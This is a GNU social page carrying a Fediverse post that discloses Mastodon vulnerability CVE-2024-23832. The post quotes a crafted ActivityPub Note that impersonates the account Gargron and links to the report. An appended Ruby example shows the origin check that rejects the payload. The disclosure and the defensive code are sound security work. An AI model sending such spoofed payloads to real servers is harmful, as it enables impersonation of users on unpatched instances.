GNU social JP
GNU social JP is a Japanese GNU social server.
Untitled attachment

Notices where this attachment appears

    arcanicanis (arcanicanis@were.social)'s status on Friday, 16-Feb-2024 01:19:14 JST

    So here’s an example of one of the maliciously-crafted payloads that resulted in a 9.8 severity CVE (CVE-2024-23832) against Mastodon:

    {
      "@context": ["https://www.w3.org/ns/activitystreams"],
      "id": "https://mastodon.social/users/Gargron/posts/123456",
      "type": "Note",
      "actor": "https://mastodon.social/users/Gargron",
      "attributedTo": "https://mastodon.social/users/Gargron",
      "content": "Well, this is an extremely concerning vulnerability I should have accounted for.",
      "to": [ "https://www.w3.org/ns/activitystreams#Public" ],
      "cc": [ "https://mastodon.social/users/Gargron/followers" ],
      "published": "2024-01-28T22:00:00Z"
    }

    I previously double-checked with one of the Mastodon developers (while CC'ing the Mastodon Security email) to confirm that I'm free to release the details at this scheduled time (Feb 15th 15:00 UTC). According to the current observed metrics on FediDB, >73.6% of Mastodon instances are patched against CVE-2024-23832, as manually tabulated.

    For more details on the vulnerability, the original security report as it was submitted on Github is available at: https://arcanican.is/excerpts/cve-2024-23832/

    My recount of events (as well as unsolicited commentary and criticisms on the vulnerability, ecosystem, etc; when I get around to finishing it): https://arcanican.is/excerpts/cve-2024-23832/discovery.htm

    In conversation Friday, 16-Feb-2024 01:19:14 JST from were.social
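The check that a payload like the one quoted above relies on being absent, written out as an added example (this is not code from arcanicanis's post and not Mastodon's own code): an ActivityPub receiver should only trust an object's id, attributedTo and actor when their origin (scheme, host, port) matches the origin that vouched for the object, meaning either the URL the object was fetched from or the actor whose HTTP signature authenticated the inbox delivery. The delivering actor https://example.org/users/alice and the helper names are assumptions made for the example; the sample object is the post's payload embedded as constructed input.

```ruby
require 'json'
require 'uri'

# Origin = scheme + host + port, the unit an ActivityPub receiver extends
# trust to. Returns nil for anything that is not an absolute http(s) URI.
def origin_of(uri_string)
  return nil unless uri_string.is_a?(String)
  uri = URI.parse(uri_string)
  return nil unless uri.is_a?(URI::HTTP) && uri.host
  "#{uri.scheme}://#{uri.host.downcase}:#{uri.port}"
rescue URI::InvalidURIError
  nil
end

# ActivityPub lets "attributedTo"/"actor" be a string, an array, or an
# inline object; reduce any of these to a single id string (or nil).
def ref_id(value)
  value = value.first if value.is_a?(Array)
  value = value['id'] if value.is_a?(Hash)
  value
end

# Validate an object against the origin that vouched for it: the origin of
# the URL it was fetched from, or of the actor whose HTTP signature
# authenticated the inbox delivery. Returns [accepted?, reason].
def validate_origin(object, source_origin)
  id_origin = origin_of(object['id'])
  return [false, 'object id is not an absolute http(s) URI'] if id_origin.nil?
  return [false, "id origin #{id_origin} != source origin #{source_origin}"] unless id_origin == source_origin

  %w[attributedTo actor].each do |key|
    next unless object.key?(key)
    owner_origin = origin_of(ref_id(object[key]))
    return [false, "#{key} origin #{owner_origin.inspect} != id origin #{id_origin}"] unless owner_origin == id_origin
  end
  [true, 'ok']
end

# The payload quoted in the post above, embedded here as constructed sample input.
PAYLOAD = JSON.parse(<<~'JSON')
  {
    "@context": ["https://www.w3.org/ns/activitystreams"],
    "id": "https://mastodon.social/users/Gargron/posts/123456",
    "type": "Note",
    "actor": "https://mastodon.social/users/Gargron",
    "attributedTo": "https://mastodon.social/users/Gargron",
    "content": "Well, this is an extremely concerning vulnerability I should have accounted for.",
    "to": [ "https://www.w3.org/ns/activitystreams#Public" ],
    "cc": [ "https://mastodon.social/users/Gargron/followers" ],
    "published": "2024-01-28T22:00:00Z"
  }
JSON

# Hypothetical actor on a third-party server (name is an assumption for the example).
DELIVERING_ACTOR = 'https://example.org/users/alice'

# The payload delivered (and signed) by an actor that does not own mastodon.social: rejected.
def reject_example
  validate_origin(PAYLOAD, origin_of(DELIVERING_ACTOR))
end

# The same payload vouched for by the origin it claims to be from: accepted.
def accept_example
  validate_origin(PAYLOAD, origin_of('https://mastodon.social/users/Gargron'))
end

# id on mastodon.social but attributedTo on another origin: also rejected.
def mismatched_owner_example
  validate_origin(PAYLOAD.merge('attributedTo' => DELIVERING_ACTOR), origin_of(PAYLOAD['id']))
end

if __FILE__ == $PROGRAM_NAME
  puts "delivered by #{DELIVERING_ACTOR}: #{reject_example.inspect}"
  puts "delivered by mastodon.social:   #{accept_example.inspect}"
  puts "attributedTo mismatch:           #{mismatched_owner_example.inspect}"
end
```

The source origin must come from something the receiver has already authenticated (the TLS-fetched URL or the verified HTTP-signature key owner), never from fields inside the object itself; comparing id against actor alone would accept the quoted payload, since both point at mastodon.social.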

GNU social JP is a social network, courtesy of GNU social JP管理人. It runs on GNU social, version 2.0.2-dev, available under the GNU Affero General Public License.

All GNU social JP content and data are available under the Creative Commons Attribution 3.0 license.